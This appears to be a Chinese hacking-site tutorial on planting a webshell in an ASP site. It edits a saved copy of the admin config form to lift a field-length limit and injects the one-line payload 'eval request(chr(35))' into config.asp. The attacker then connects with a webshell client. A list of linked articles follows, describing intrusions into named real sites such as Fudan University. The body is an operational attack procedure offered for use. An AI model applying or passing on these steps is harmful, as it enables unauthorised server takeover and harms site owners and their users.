|
进入http://url/admin.asp?action=ShowConfig,查看原代码
查找<td><input name=\"RecordNum\" type=\"text\" id=\"RecordNum\" value=\"100\" size=\"40\" maxlength=\"3\"></td>
修改maxlength=\"3\"为maxlength=\"50\">
然后查找 <form name=\"form1\" method=\"post\" action=\"?Action=SaveConfig\">处
修改为action=\"http://url/admin?Action=SaveConfig\">
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35))
此处没有哪个\"的然后保存设置后提示成功后
用海洋eval连接http://url/config.asp文件就获得一个webshell!
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |